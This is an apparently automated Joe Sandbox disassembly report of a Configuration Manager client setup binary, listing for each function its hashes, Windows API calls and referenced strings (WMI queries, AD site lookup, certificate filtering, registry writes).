                                                                                          • Opcode ID: 893eae12e97b739985195ccad74b6a602239adcf3035810443bfd74a8cacee36
                                                                                          • Instruction ID: f60573fc3e3004f4d1121ab9323cdbc6b0c8fb3a088a246d5281019d00bf3e9e
                                                                                          • Opcode Fuzzy Hash: 893eae12e97b739985195ccad74b6a602239adcf3035810443bfd74a8cacee36
                                                                                          • Instruction Fuzzy Hash: EE51D371D4020AEADF10EFA48D49AFEBEBABF05710F14805AF944F7282D7799940C7A1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A1D3A
                                                                                            • Part of subcall function 00623DD4: __EH_prolog3_catch.LIBCMT ref: 00623DDB
                                                                                            • Part of subcall function 00623CB6: __EH_prolog3_catch.LIBCMT ref: 00623CBD
                                                                                            • Part of subcall function 00623D45: __EH_prolog3_catch.LIBCMT ref: 00623D4C
                                                                                            • Part of subcall function 00624502: __EH_prolog3_catch.LIBCMT ref: 00624509
                                                                                            • Part of subcall function 00624884: __EH_prolog3_catch.LIBCMT ref: 0062488B
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,CSetupEnvironment::Initialize), ref: 005A1DDC
                                                                                          • GetLastError.KERNEL32 ref: 005A1DE6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A1E1B
                                                                                            • Part of subcall function 005B849A: __EH_prolog3_catch_GS.LIBCMT ref: 005B84A1
                                                                                            • Part of subcall function 005B849A: GetCurrentThreadId.KERNEL32 ref: 005B8526
                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 005A1E7B
                                                                                          • GetLastError.KERNEL32 ref: 005A1E85
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A1EBA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A1FDD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A202D
                                                                                          Strings
                                                                                          • setupenv.cpp, xrefs: 005A1EC3
                                                                                          • DetectPlatform(m_sPlatform), xrefs: 005A1FD3
                                                                                          • GetModuleFileNameW(0, szPath, (sizeof(szPath)/sizeof(szPath[0]))) > 0, xrefs: 005A1E11
                                                                                          • setupenv.cpp, xrefs: 005A1FE6
                                                                                          • Detected client installed with version '%s', xrefs: 005A20A0
                                                                                          • setupenv.cpp, xrefs: 005A1EAA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A1EB5
                                                                                          • setupenv.cpp, xrefs: 005A1FCD
                                                                                          • \, xrefs: 005A1EDD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A2028
                                                                                          • GetFullPathNameW(m_sModulePath, (sizeof(szPath)/sizeof(szPath[0])), szPath, 0) > 0, xrefs: 005A1EB0
                                                                                          • CSetupEnvironment::Initialize, xrefs: 005A1D63
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A1E16
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A1FD8
                                                                                          • b, xrefs: 005A2095
                                                                                          • IsClientInstalled(m_bClientInstalled), xrefs: 005A2023
                                                                                          • setupenv.cpp, xrefs: 005A2036
                                                                                          • setupenv.cpp, xrefs: 005A1E0B
                                                                                          • setupenv.cpp, xrefs: 005A201D
                                                                                          • setupenv.cpp, xrefs: 005A1E24
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$ErrorH_prolog3_catch_LastName$FileFullModulePath
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CSetupEnvironment::Initialize$DetectPlatform(m_sPlatform)$Detected client installed with version '%s'$GetFullPathNameW(m_sModulePath, (sizeof(szPath)/sizeof(szPath[0])), szPath, 0) > 0$GetModuleFileNameW(0, szPath, (sizeof(szPath)/sizeof(szPath[0]))) > 0$IsClientInstalled(m_bClientInstalled)$\$b$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp
                                                                                          • API String ID: 749637812-1787247226
                                                                                          • Opcode ID: 0ab2374e76e435ca26ec3c66b29f5b7a0a3bdbd70c710df44d08ad92021b74e2
                                                                                          • Instruction ID: a137ed01d7046928d9b9f15de0404f5978c87e2a3a52b3d44336d9d9f43636c1
                                                                                          • Opcode Fuzzy Hash: 0ab2374e76e435ca26ec3c66b29f5b7a0a3bdbd70c710df44d08ad92021b74e2
                                                                                          • Instruction Fuzzy Hash: 2791F471941269AADB20EB648C4EFEE7FA9BF11700F0040D9F905BB2C2DB785B44CB65
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00603B6D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603BC5
                                                                                            • Part of subcall function 006092A8: __EH_prolog3.LIBCMT ref: 006092AF
                                                                                            • Part of subcall function 00609305: __EH_prolog3.LIBCMT ref: 0060930C
                                                                                            • Part of subcall function 00609305: SysFreeString.OLEAUT32(000000FF), ref: 00609321
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603C23
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603C61
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603D19
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603DC2
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$FreeH_prolog3_catchString
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$CCM::Utility::Wmi::Namespace::Query$WQL$WQL$getPointer()->ExecQuery( BString(L"WQL"), BString(pszQuery), lFlags, pContext, ppEnum )$null() == false$pThis->CheckConnection()$ppEnum != 0$pszQuery != 0
                                                                                          • API String ID: 3270846742-1158606948
                                                                                          • Opcode ID: db4c4cddf17061f1f1003fcda8a13fbcbbf2eee24f459ab031a82c1530f74593
                                                                                          • Instruction ID: 631cb7468c4ea1da3bdb5d64ac70dc601b1c3d9293e0323942cf80d13f74b4ba
                                                                                          • Opcode Fuzzy Hash: db4c4cddf17061f1f1003fcda8a13fbcbbf2eee24f459ab031a82c1530f74593
                                                                                          • Instruction Fuzzy Hash: 4861F471A80259ABCB18EFA4C84AEEF7F6AAF54704F148059F5046B3C2DB798E05CB51
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0060855F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006085C0
                                                                                          • PathIsUNCServerShareW.SHLWAPI(?,?,CCM::Utility::Filesystem::RecursiveCreatePath,0000004C,00607ED9,?,00000000,?), ref: 00608600
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060862D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060868D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006086FF
                                                                                          • CreateDirectoryW.KERNEL32(?,?,00000001,00000000,00000000,00000000,?,00000000,00000000,007525B8,000000FF,00000000,?), ref: 00608716
                                                                                          • GetLastError.KERNEL32 ref: 00608720
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00608756
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CreateDirectoryErrorH_prolog3H_prolog3_catch_LastPathServerShare
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::RecursiveCreatePath$CreateDirectoryW(pszPath, psa)$RecursiveCreatePath(sPath.substr(0, nPos), psa)$nPos != String::npos$pszPath
                                                                                          • API String ID: 1059470568-328628518
                                                                                          • Opcode ID: 306f4f2718edd412ad01531b5c63b55d4e7a72bff6e4920781876651bda8aa70
                                                                                          • Instruction ID: 924385bbec61ea4840cd6e8dc0f413380b7a1c30b69e82857a0826dbd856d7d7
                                                                                          • Opcode Fuzzy Hash: 306f4f2718edd412ad01531b5c63b55d4e7a72bff6e4920781876651bda8aa70
                                                                                          • Instruction Fuzzy Hash: F1510CB09C0344AEDB25EBA48D0AFFF7E65AF16B11F144045F981772C3DAB94A0AC751
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00596806
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCommandLineW.KERNEL32 ref: 0059685D
                                                                                            • Part of subcall function 005F53EA: __EH_prolog3_catch_GS.LIBCMT ref: 005F53F1
                                                                                            • Part of subcall function 005F53EA: GetCurrentThreadId.KERNEL32 ref: 005F54B1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00596954
                                                                                            • Part of subcall function 0059BADB: __EH_prolog3_catch.LIBCMT ref: 0059BAE2
                                                                                            • Part of subcall function 0059BADB: StartServiceCtrlDispatcherW.ADVAPI32(ccmsetup,CcmSetup::RunService,00000020,005968AB,00000001,00000000,?,/runservice,00000000), ref: 0059BB1E
                                                                                            • Part of subcall function 0059BADB: GetLastError.KERNEL32 ref: 0059BB28
                                                                                            • Part of subcall function 0059BADB: GetCurrentThreadId.KERNEL32 ref: 0059BB5E
                                                                                            • Part of subcall function 00634534: __EH_prolog3_catch_GS.LIBCMT ref: 0063453B
                                                                                            • Part of subcall function 00634534: GetCurrentThreadId.KERNEL32 ref: 006345E7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00596C11
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Logon installation has detected an existing version of the Configuration Manager Client., xrefs: 00596B64
                                                                                          • Detected client version %s from WMI., xrefs: 00596A5B
                                                                                          • No version of the client is currently detected., xrefs: 00596A14
                                                                                          • 4.0.5931.0, xrefs: 00596A91
                                                                                          • DNk, xrefs: 00596A00
                                                                                          • Upgrade from the existing client version '%s'. The minimum version supported to upgrade is '%s'. Client upgrade will continue but , xrefs: 00596B0D
                                                                                          • lVk, xrefs: 00596AF7
                                                                                          • ccmsetup.cpp, xrefs: 00596944
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059694F
                                                                                          • This operating system or service pack is not supported., xrefs: 005968F5
                                                                                          • CcmSetup::PrepareForRun, xrefs: 00596831
                                                                                          • ccmsetup.cpp, xrefs: 00596C19
                                                                                          • ccmsetup.cpp, xrefs: 0059695C
                                                                                          • Attempting #%d retry. Max %d retries., xrefs: 00596BB6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00596C0C
                                                                                          • @Lk, xrefs: 005969A5
                                                                                          • ParseCommandLine(), xrefs: 0059694A
                                                                                          • /runservice, xrefs: 00596872
                                                                                          • ccmsetup.cpp, xrefs: 00596C01
                                                                                          • SetObjectSecurity( m_sDownloadDir, c_szDownloadDirectorySecurity ), xrefs: 00596C07
                                                                                          • T[k, xrefs: 00596B9C
                                                                                          • SMSPROVISIONINGMODE, xrefs: 0059697D
                                                                                          • Ccmsetup will run as an evaluation., xrefs: 005969B9
                                                                                          • O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY), xrefs: 00596BD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$CommandCtrlDispatcherErrorH_prolog3H_prolog3_catchLastLineServiceStart
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/runservice$4.0.5931.0$@Lk$Attempting #%d retry. Max %d retries.$CcmSetup::PrepareForRun$Ccmsetup will run as an evaluation.$DNk$Detected client version %s from WMI.$Logon installation has detected an existing version of the Configuration Manager Client.$No version of the client is currently detected.$O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)$ParseCommandLine()$SMSPROVISIONINGMODE$SetObjectSecurity( m_sDownloadDir, c_szDownloadDirectorySecurity )$T[k$This operating system or service pack is not supported.$Upgrade from the existing client version '%s'. The minimum version supported to upgrade is '%s'. Client upgrade will continue but $ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$lVk
                                                                                          • API String ID: 356148672-1948820152
                                                                                          • Opcode ID: 7620edfd5d251123318172d5936756e3c26047e47a5fe6d056665503b38af3d1
                                                                                          • Instruction ID: 028cf81441a982d8b12ff7107aa06d9d56b29a28d46f9cafca8d5ce441cbeace
                                                                                          • Opcode Fuzzy Hash: 7620edfd5d251123318172d5936756e3c26047e47a5fe6d056665503b38af3d1
                                                                                          • Instruction Fuzzy Hash: BFC1D1B1D00319EADF24EFA4C95ABEDBFBABF50304F144059E145B7282DB745A88CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00586ACC
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005771EF: __EH_prolog3.LIBCMT ref: 005771F6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00586BB2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00586CBA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00586DD1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00586E2B
                                                                                          Strings
                                                                                          • GetADInstallParams failed with 0x%x, xrefs: 00586EB6
                                                                                          • LSGetAssignedSiteFromAD(sSiteCode), xrefs: 00586BA8
                                                                                          • FromAD: FSP = %s, xrefs: 00586D19
                                                                                          • AUTO, xrefs: 00586B5F
                                                                                          • ccmsetup.cpp, xrefs: 00586E1B
                                                                                          • FromAD: command line = %s, xrefs: 00586D7D
                                                                                          • LSGetClientDeploymentInfoFromAD( sSiteCode, m_sSiteVersion, sCommandLine, sFSP, oSecurityMode ), xrefs: 00586CB0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586DCC
                                                                                          • ccmsetup.cpp, xrefs: 00586DD9
                                                                                          • ccmsetup.cpp, xrefs: 00586DC1
                                                                                          • ccmsetup.cpp, xrefs: 00586BBA
                                                                                          • CcmSetup::GetADInstallParams, xrefs: 00586B24
                                                                                          • GetDefaultMPByAD(sSiteCode.c_str()), xrefs: 00586E21
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586BAD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586E26
                                                                                          • Failed to get assigned site from AD. Error 0x%x, xrefs: 00586BEE
                                                                                          • Got site code '%s' from AD., xrefs: 00586C52
                                                                                          • ParseLightCommandLine(sCommandLine), xrefs: 00586DC7
                                                                                          • ccmsetup.cpp, xrefs: 00586CAA
                                                                                          • ccmsetup.cpp, xrefs: 00586CC2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586CB5
                                                                                          • ccmsetup.cpp, xrefs: 00586E33
                                                                                          • ccmsetup.cpp, xrefs: 00586BA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$AUTO$CcmSetup::GetADInstallParams$Failed to get assigned site from AD. Error 0x%x$FromAD: FSP = %s$FromAD: command line = %s$GetADInstallParams failed with 0x%x$GetDefaultMPByAD(sSiteCode.c_str())$Got site code '%s' from AD.$LSGetAssignedSiteFromAD(sSiteCode)$LSGetClientDeploymentInfoFromAD( sSiteCode, m_sSiteVersion, sCommandLine, sFSP, oSecurityMode )$ParseLightCommandLine(sCommandLine)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2734623419-2132489462
                                                                                          • Opcode ID: 18cb0dbbfabdf0d1c7e7df9910c9743a99b5e16ff36991dfc7044a555977ea26
                                                                                          • Instruction ID: 206eb2318700bd5d475868888891f63e98ed7168de87820b7c1716cb0a37494f
                                                                                          • Opcode Fuzzy Hash: 18cb0dbbfabdf0d1c7e7df9910c9743a99b5e16ff36991dfc7044a555977ea26
                                                                                          • Instruction Fuzzy Hash: 33B1AF71D00219AADB20EBA4CC4AFEEBFB9BF55304F148099E909B7281D7745E48CF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006240D8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062419A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006242F4
                                                                                          • CertOpenStore.CRYPT32(00000002,00000000,00000000,00000000,00000000), ref: 00624354
                                                                                          • CertFindChainInStore.CRYPT32(?,00000001,00000006,00000001,00000020,00000000), ref: 00624372
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006243C0
                                                                                          • GetLastError.KERNEL32(00000002,?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000), ref: 00624420
                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 006244B1
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • ..\CcmCert.cpp, xrefs: 0062418A
                                                                                          • ..\CcmCert.cpp, xrefs: 006243CC
                                                                                          • , xrefs: 00624338
                                                                                          • Finding certificate by issuer chain returned error %08X, xrefs: 00624427
                                                                                          • ..\CcmCert.cpp, xrefs: 006242E4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006242EF
                                                                                          • Completed searching client certificates based on Certificate Issuers, xrefs: 006244DC
                                                                                          • ..\CcmCert.cpp, xrefs: 006243B0
                                                                                          • sCertIssuers.tokenize(c_szCertIssuer_Separator, saIssuers), xrefs: 00624190
                                                                                          • CcmGetEncodedName(saIssuers[issuerIndex], pIssuerNameBlobs[issuerIndex]), xrefs: 006242EA
                                                                                          • ..\CcmCert.cpp, xrefs: 006242FC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00624195
                                                                                          • Begin searching client certificates based on Certificate Issuers, xrefs: 0062414F
                                                                                          • Certificate Issuer %d [%s], xrefs: 006242A6
                                                                                          • No Certificate Issuers specified, xrefs: 00624206
                                                                                          • CcmUtilLib::CcmGetFilteredCertificateStoreByIssuers, xrefs: 0062410C
                                                                                          • ..\CcmCert.cpp, xrefs: 006241A6
                                                                                          • CheckAddCertToStoreByIssuers(pCertChain, hFilteredStore, pIssuerNameBlobs, nIssuers, bCertificatesFound), xrefs: 006243B6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006243BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertStore$ChainCloseErrorFindH_prolog3_catchLastOpen
                                                                                          • String ID: $%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$Begin searching client certificates based on Certificate Issuers$CcmGetEncodedName(saIssuers[issuerIndex], pIssuerNameBlobs[issuerIndex])$CcmUtilLib::CcmGetFilteredCertificateStoreByIssuers$Certificate Issuer %d [%s]$CheckAddCertToStoreByIssuers(pCertChain, hFilteredStore, pIssuerNameBlobs, nIssuers, bCertificatesFound)$Completed searching client certificates based on Certificate Issuers$Finding certificate by issuer chain returned error %08X$No Certificate Issuers specified$sCertIssuers.tokenize(c_szCertIssuer_Separator, saIssuers)
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005C9493
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C9512
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C957A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C95C8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C9622
                                                                                          Strings
                                                                                          • LastTopicType, xrefs: 005C9542
                                                                                          • regKey.SetDword( c_szRegValue_LastStateID, uStateID ), xrefs: 005C95BE
                                                                                          • regKey.SetDword( c_szRegValue_LastTopicType, uTopicType ), xrefs: 005C9570
                                                                                          • state.cpp, xrefs: 005C9582
                                                                                          • CDeploymentStateMessage::SaveStateMessageToReg, xrefs: 005C94AF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C9575
                                                                                          • state.cpp, xrefs: 005C95D0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C95C3
                                                                                          • LastStateID, xrefs: 005C958C
                                                                                          • state.cpp, xrefs: 005C951A
                                                                                          • regKey.SetString( c_szRegValue_LastStateParams, sParams ), xrefs: 005C9618
                                                                                          • state.cpp, xrefs: 005C962A
                                                                                          • state.cpp, xrefs: 005C956A
                                                                                          • Software\Microsoft\CCMSetup, xrefs: 005C94D5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C961D
                                                                                          • state.cpp, xrefs: 005C95B8
                                                                                          • state.cpp, xrefs: 005C9612
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C950D
                                                                                          • LastStateParams, xrefs: 005C95E6
                                                                                          • regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess ), xrefs: 005C9508
                                                                                          • state.cpp, xrefs: 005C9502
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CDeploymentStateMessage::SaveStateMessageToReg$LastStateID$LastStateParams$LastTopicType$Software\Microsoft\CCMSetup$regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess )$regKey.SetDword( c_szRegValue_LastStateID, uStateID )$regKey.SetDword( c_szRegValue_LastTopicType, uTopicType )$regKey.SetString( c_szRegValue_LastStateParams, sParams )$state.cpp$state.cpp$state.cpp$state.cpp$state.cpp$state.cpp$state.cpp$state.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006492A9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00649360
                                                                                          • LsaClose.ADVAPI32(?), ref: 00649506
                                                                                          • LsaFreeMemory.ADVAPI32(00000000), ref: 00649514
                                                                                          Strings
                                                                                          • Failed to query policy using LsaQueryInformationPolicy(), xrefs: 00649443
                                                                                          • CCM::LocationServices::LSJoinedToADDomain, xrefs: 006492B9
                                                                                          • Local machine is not a member of an AD domain, xrefs: 0064947D
                                                                                          • ..\lsad.cpp, xrefs: 0064941F
                                                                                          • LSJoinedToADDomain, xrefs: 0064931C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006493CC
                                                                                          • GetPolicyHandle(&hLsa), xrefs: 00649356
                                                                                          • LsaNtStatusToWinError(ntsResult), xrefs: 006493C7
                                                                                          • ..\lsad.cpp, xrefs: 00649350
                                                                                          • ..\lsad.cpp, xrefs: 006493DD
                                                                                          • Local Machine is joined to an AD domain, xrefs: 006494C8
                                                                                          • ..\lsad.cpp, xrefs: 00649403
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064935B
                                                                                          • (pPolicyInfo != NULL), xrefs: 00649409
                                                                                          • ..\lsad.cpp, xrefs: 006493C1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064940E
                                                                                          • ..\lsad.cpp, xrefs: 00649368
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentFreeH_prolog3_catchMemoryThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pPolicyInfo != NULL)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSJoinedToADDomain$Failed to query policy using LsaQueryInformationPolicy()$GetPolicyHandle(&hLsa)$LSJoinedToADDomain$Local Machine is joined to an AD domain$Local machine is not a member of an AD domain$LsaNtStatusToWinError(ntsResult)
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006346B9
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063474B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006347BD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063480C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063485B
                                                                                          Strings
                                                                                          • select ClientVersion from SMS_Client, xrefs: 00634785
                                                                                          • spNS.Open(L"root\\ccm"), xrefs: 00634741
                                                                                          • ..\smsutil.cpp, xrefs: 006347AD
                                                                                          • spNS.Query(L"select ClientVersion from SMS_Client", &spEnum), xrefs: 006347B3
                                                                                          • root\ccm, xrefs: 00634713
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00634807
                                                                                          • SMS::Utility::GetClientVersionFromWMI, xrefs: 006346EA
                                                                                          • spEnum.Next (&spObj), xrefs: 00634802
                                                                                          • spObj.GetString (L"ClientVersion", sClientVersion), xrefs: 00634851
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006347B8
                                                                                          • ClientVersion, xrefs: 0063481F
                                                                                          • ..\smsutil.cpp, xrefs: 006347C5
                                                                                          • ..\smsutil.cpp, xrefs: 006347FC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00634746
                                                                                          • ..\smsutil.cpp, xrefs: 0063473B
                                                                                          • ..\smsutil.cpp, xrefs: 00634863
                                                                                          • ..\smsutil.cpp, xrefs: 00634753
                                                                                          • ..\smsutil.cpp, xrefs: 0063484B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00634856
                                                                                          • ..\smsutil.cpp, xrefs: 00634814
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$..\smsutil.cpp$ClientVersion$SMS::Utility::GetClientVersionFromWMI$root\ccm$select ClientVersion from SMS_Client$spEnum.Next (&spObj)$spNS.Open(L"root\\ccm")$spNS.Query(L"select ClientVersion from SMS_Client", &spEnum)$spObj.GetString (L"ClientVersion", sClientVersion)
                                                                                          APIs
